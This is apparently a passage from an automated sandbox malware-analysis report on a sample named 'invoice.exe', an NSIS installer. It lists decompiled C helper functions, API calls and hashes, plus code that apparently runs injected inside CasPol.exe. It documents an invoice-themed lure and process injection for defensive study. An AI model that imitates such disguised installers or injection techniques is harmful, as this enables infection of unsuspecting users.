Instruction Fuzzy Hash: 48017171500609ABDF205F51DD80E6F3B65EB84754F14403BFA01751D2C77A8CA29F9A

Uniqueness

Uniqueness Score: -1.00%

Function 004059EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004059EB(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405F65(0x42bc78, _a4);
				_t21 = E00405996(0x42bc78);
				if(_t21 != 0) {
					E004061CF(_t21);
					if(( *0x42f41c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc78;
						while(1) {
							_t11 = lstrlenA(0x42bc78);
							_push(0x42bc78);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00406268();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405944(0x42bc78);
								continue;
							} else {
								goto L1;
							}
						}
						E004058FD();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x004059f7
0x00405a02
0x00405a06
0x00405a0d
0x00405a19
0x00405a25
0x00405a25
0x00405a3d
0x00405a3e
0x00405a45
0x00405a46
0x00000000
0x00000000
0x00405a29
0x00405a30
0x00405a38
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a30
0x00405a48
0x00000000
0x00405a5c
0x00405a1b
0x00405a1f
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a1f
0x00405a08
0x00000000

APIs

Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Yllerion Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72

Part of subcall function 00405996: CharNextA.USER32(?,?,0042BC78,?,00405A02,0042BC78,0042BC78,76793410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059A4
Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059A9
Part of subcall function 00405996: CharNextA.USER32(00000000), ref: 004059BD

lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,76793410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,76793410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A3E
GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,76793410,?,C:\Users\user\AppData\Local\Temp\,0040574D,?,76793410,C:\Users\user\AppData\Local\Temp\), ref: 00405A4E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004059EB

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3355392842
Opcode ID: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
Instruction ID: 1f06baf1138d21f74630751e728cacf5283a8138a78bcc2982ba797f27b9272c
Opcode Fuzzy Hash: abce9bb9807016b4c276db8bae45b4b3eed95d690bc7d0fbdb1e72e6f8ad0fcb
Instruction Fuzzy Hash: 53F0C831315DA256C622323A1D45AAF1B45CE87338709477FF891B12D2EB3C89439EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405604 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405604(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c078->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c078,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040560d
0x0040562d
0x00405635
0x0040563a
0x00000000
0x00405640
0x00405644

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C078,Error launching installer), ref: 0040562D
CloseHandle.KERNEL32(?), ref: 0040563A

Strings

Error launching installer, xrefs: 00405617

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction ID: a14d50d96640d218925096829ca07d1800dc2b789f456133151d87fd2ad2a836
Opcode Fuzzy Hash: a2b9ecb8406674d5a7d1aded78611502900df459338db245270d40db8d5eaf79
Instruction Fuzzy Hash: 9EE046F0640209BFEB109FA0ED49F7F7AACEB00704F404921BD00F2290E67499088A7C

Uniqueness

Uniqueness Score: -1.00%

Function 00405944 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405944(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405945
0x0040594f
0x00405951
0x00405958
0x00405960
0x00000000
0x00000000
0x00000000
0x00405960
0x00405962
0x00405967

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\invoice.exe,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 0040594A
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\invoice.exe,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 00405958

Strings

C:\Users\user\Desktop, xrefs: 00405944

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction ID: 9e2646df26482555437471894173605ef17f2c9d125cfcd2b42401f98a5df656
Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
Instruction Fuzzy Hash: D6D0C9A240DDB1AEE70363249C04B9F6A88DF17710F0944A6E180B61A5C77C4D828BAD

Uniqueness

Uniqueness Score: -1.00%

Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x1000405c = _a8;
				 *0x10004060 = _a16;
				 *0x10004064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556, _t52);
				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
				_t17 = E1000123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E10001266(E100012AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E100012D1( *_t55 - 0x30, E1000123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001508(_t31 + 4,  *0x10004064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001508( *0x10004064, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x100010e7
0x100010ef
0x10001103
0x1000110b
0x10001116
0x10001119
0x10001121
0x10001124
0x10001126
0x100011c4
0x100011d0
0x1000112c
0x1000112d
0x1000112d
0x10001130
0x10001131
0x10001134
0x10001203
0x10001206
0x1000119e
0x100011a4
0x100011ac
0x100011b1
0x100011b4
0x00000000
0x100011b4
0x10001209
0x1000120a
0x10001186
0x1000118c
0x10001194
0x00000000
0x10001194
0x10001152
0x10001153
0x1000115b
0x10001168
0x10001170
0x10001179
0x1000117e
0x1000117e
0x00000000
0x10001153
0x1000113a
0x100011d1
0x100011d1
0x100011d8
0x100011e5
0x100011ea
0x100011ef
0x100011f5
0x100011fb
0x100011fb
0x00000000
0x100011d8
0x10001140
0x10001143
0x00000000
0x00000000
0x10001149
0x1000114c
0x1000119b
0x00000000
0x1000119b
0x1000114f
0x10001150
0x10001183
0x00000000
0x10001183
0x00000000
0x100011ba
0x100011ba
0x00000000
0x100011c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
GlobalFree.KERNEL32(00000000), ref: 100011B4
GlobalFree.KERNEL32(?), ref: 100011C7
GlobalFree.KERNEL32(?), ref: 100011F5

Memory Dump Source

Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_invoice.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00405A63 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A63(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405a73
0x00405a75
0x00405a78
0x00405aa4
0x00405a7d
0x00405a86
0x00405a8b
0x00405a96
0x00405a99
0x00405ab5
0x00405a9b
0x00405aa2
0x00000000
0x00405aa2
0x00405aae
0x00405ab2
0x00405ab2
0x00405aac
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A8B
CharNextA.USER32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A9C
lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
Instruction ID: de8867e187cffd76a1833f018909c3af52f45fcf8c0597c8515af2ce59788131
Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
Instruction Fuzzy Hash: F5F0C231201818AFCB02DBA4CD80D9EBBA8EF46350B2540B9E840F7211D774DE019FA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 1520, Parent PID: 4636COMMON

Executed Functions

Function 37746DE3 Relevance: .7, Instructions: 689COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2122a53f9b6b72115b66811f7a4584317995e889af1383988683cbd66599c566
Instruction ID: 4745326d0e95f516736cbea73c9bfee16bd7f9cb0ce9f65ec1128a70ca55950b
Opcode Fuzzy Hash: 2122a53f9b6b72115b66811f7a4584317995e889af1383988683cbd66599c566
Instruction Fuzzy Hash: E662B274E012298FDB64DF69C884BDDBBB2BB89305F5085E9D408AB355DB34AE81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 37740CA0 Relevance: 11.6, Strings: 9, Instructions: 374COMMON

Download Yara Rule

Strings

,hv7, xrefs: 37740DA9
LRuq, xrefs: 37740E1A
,hv7, xrefs: 37740DC8
,hv7, xrefs: 37740D0E
,hv7, xrefs: 37740D2D
,hv7, xrefs: 37740CEF
,hv7, xrefs: 37740D6B
,hv7, xrefs: 37740D4C
,hv7, xrefs: 37740D8A

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID: ,hv7$,hv7$,hv7$,hv7$,hv7$,hv7$,hv7$,hv7$LRuq
API String ID: 0-554218972
Opcode ID: 7a2171dc1b9ecb675d28909249472c0446b401b934adcb3c70daeb4db601ef59
Instruction ID: 179facfde25ae514ff40affb0d53d329e46741049addf2509f8e26051df7c20a
Opcode Fuzzy Hash: 7a2171dc1b9ecb675d28909249472c0446b401b934adcb3c70daeb4db601ef59
Instruction Fuzzy Hash: 6F12D77490021ADFCB64DFA4C995B9DBBB1BF89305F1085A5D809BB355DB386D82CF80

Uniqueness

Uniqueness Score: -1.00%

Function 37742F57 Relevance: 3.0, Strings: 2, Instructions: 458COMMON

Download Yara Rule

Strings

)t7\, xrefs: 37743044
)t7\, xrefs: 37743090

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID: )t7\$)t7\
API String ID: 0-3197171835
Opcode ID: e26b2a4243287e5f16a0ba4521643fc7526b68ee07f4f3934670f2ec1245b6a7
Instruction ID: 17bdd1b8399e1ac654023bbd95896a570121ccb47ccedba9322fdfe5a3b113fc
Opcode Fuzzy Hash: e26b2a4243287e5f16a0ba4521643fc7526b68ee07f4f3934670f2ec1245b6a7
Instruction Fuzzy Hash: BCC1C4FE500E46A6D1021A3CC54E8B9BFB36B0E5343C80F4580DDBE8B9D65AF36586D6

Uniqueness

Uniqueness Score: -1.00%

Function 37743879 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

Th7U, xrefs: 37743884

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID: Th7U
API String ID: 0-2833897534
Opcode ID: 5c5cf63a1f4bd3dfa78bcd35c9e8712e9ca7d00566cbcfbbc77bc3c3110f202e
Instruction ID: 0f22f25d0076cf3d45da48a2e2d0c61b638ea035daf1c0f195433d2bd94b6b3e
Opcode Fuzzy Hash: 5c5cf63a1f4bd3dfa78bcd35c9e8712e9ca7d00566cbcfbbc77bc3c3110f202e
Instruction Fuzzy Hash: 2151E478E01208DFCB58DFB9D48099DBBB2FF89304B209469E805BB364DB35A956CF50

Uniqueness

Uniqueness Score: -1.00%

Function 37744CF0 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccb4d78575199768a5555c3703a71310059f8f418fa37389ee554dd45b71f99
Instruction ID: 5a0e4a1772553cd256ae9a4477d3e90a596eab293f87e93405af5bac02074d32
Opcode Fuzzy Hash: 7ccb4d78575199768a5555c3703a71310059f8f418fa37389ee554dd45b71f99
Instruction Fuzzy Hash: BF51BE742A1312AFCB016F60C6FE52A7B62FB0F3137066C12A50FA1509DF7D54A69B90

Uniqueness

Uniqueness Score: -1.00%

Function 377460AF Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fea75f93423fe7e30996f3b2d98f518927366a0df0f69d957d1fbb60f7aa42df
Instruction ID: 0155a8a7d041b519b60a040c10354b6a399a40544604afb2603a9a4ccff777e2
Opcode Fuzzy Hash: fea75f93423fe7e30996f3b2d98f518927366a0df0f69d957d1fbb60f7aa42df
Instruction Fuzzy Hash: AE615474D00318CFDB15CFA5C894BEDBBB2BF89304F60852AD805AB2A5DB356A06CF41

Uniqueness

Uniqueness Score: -1.00%

Function 37744858 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b44bd56b3f3e4c539e1cc6235813d3a6b9b9e220779cb342316aa8cea9b47b9
Instruction ID: a71c82fe3fcdb7ae600209609be179b70767df84678c8ef235a812de5f300c38
Opcode Fuzzy Hash: 2b44bd56b3f3e4c539e1cc6235813d3a6b9b9e220779cb342316aa8cea9b47b9
Instruction Fuzzy Hash: 2051A075E01258DFDB58CFA9D99499DBBF2FF89300F24916AE805AB364DB30A805CF50

Uniqueness

Uniqueness Score: -1.00%

Function 37745507 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1308d9320012b45b0fb664e134ec634315d776ad5c9945097f832a79b04e15a1
Instruction ID: 3ce5605c9d0ec9cf45e7f15328e77885ec1eec00c668f6643db04c8026ab9238
Opcode Fuzzy Hash: 1308d9320012b45b0fb664e134ec634315d776ad5c9945097f832a79b04e15a1
Instruction Fuzzy Hash: 4B411674E44208CFEB04CFA8C4886ACFBB2BB49396F609119E418BF255DB399852CF10

Uniqueness

Uniqueness Score: -1.00%

Function 377454A7 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3689a26535e563303b348e1bf949de5fb65a9c79582b13e21abb6c62ca2062e2
Instruction ID: d015acb4e28f772e9c8c1b64209595bbd5d1c12cd56a13d491b6ee0aa38ab4d2
Opcode Fuzzy Hash: 3689a26535e563303b348e1bf949de5fb65a9c79582b13e21abb6c62ca2062e2
Instruction Fuzzy Hash: 87410770E45208DFDB00CFA8C4887EDFBB2BB49356F209519E418BB295DB799952CF60

Uniqueness

Uniqueness Score: -1.00%

Function 37745358 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13b3141963eeb30d38a46306d52f1097e1ea8111dce0fe03a42f9272e7386cb9
Instruction ID: 7b7fa175c5c4294ddaad2c04d0d9793f91aed07ef5c3d8a1d136ca701fe8e3c5
Opcode Fuzzy Hash: 13b3141963eeb30d38a46306d52f1097e1ea8111dce0fe03a42f9272e7386cb9
Instruction Fuzzy Hash: A24137B0D00208DFDB04CFAAC4486DDFBB2BB89355F24D529D804BB295DB759842CF64

Uniqueness

Uniqueness Score: -1.00%

Function 37741F97 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49bd2ff374e2251484b8dd9fc8252eecf096b65f3c6d160d317cbd902c079181
Instruction ID: 2fddff0c4dc3d4ef5fc46a7d06fce752887e0277c18721fa84d9c68176bdae37
Opcode Fuzzy Hash: 49bd2ff374e2251484b8dd9fc8252eecf096b65f3c6d160d317cbd902c079181
Instruction Fuzzy Hash: E0216B35D003155FCF08DF74C8445EE7BB1EFDA270F508A6AD8159B250EB30AA1ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 377420E4 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1db96895bf1e43a581781cea96367089db541f69b9fc2411e0eefab78601e6fe
Instruction ID: 06bfa84c8473907bba944091ff6c8ac21ca65b0814d135a5d563cc499abd39cf
Opcode Fuzzy Hash: 1db96895bf1e43a581781cea96367089db541f69b9fc2411e0eefab78601e6fe
Instruction Fuzzy Hash: 6821C271E043499FCB0197B89C105DFBFB4DE8A2107248746D119BB091E6345D15C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 37741FE8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9013823867.0000000037740000.00000040.00000800.00020000.00000000.sdmp, Offset: 37740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37740000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da513f7cd7d852055817a09777b2cc53f73658d3643bd9805bda84a22d2d069
Instruction ID: a3d4052b1ee3cb9bc89a8e8bf4402e724ba16073036e442654dc871e88034242
Opcode Fuzzy Hash: 1da513f7cd7d852055817a09777b2cc53f73658d3643bd9805bda84a22d2d069
Instruction Fuzzy Hash: 7721B279A00215AFCF18DF74C440AAE37B5EF89260F60C519E9099B250DB34EA16CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 3767D4F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.9012673043.000000003767D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3767D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3767d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac1574efd2aebaffbc6a321ae81726fb83362e5a005fad2b0f00b847f5571b8
Instruction ID: 23a23718b2343ef8f0c0df1b1e7a315d4f6e322a3b8019e0f8ac36b228419327
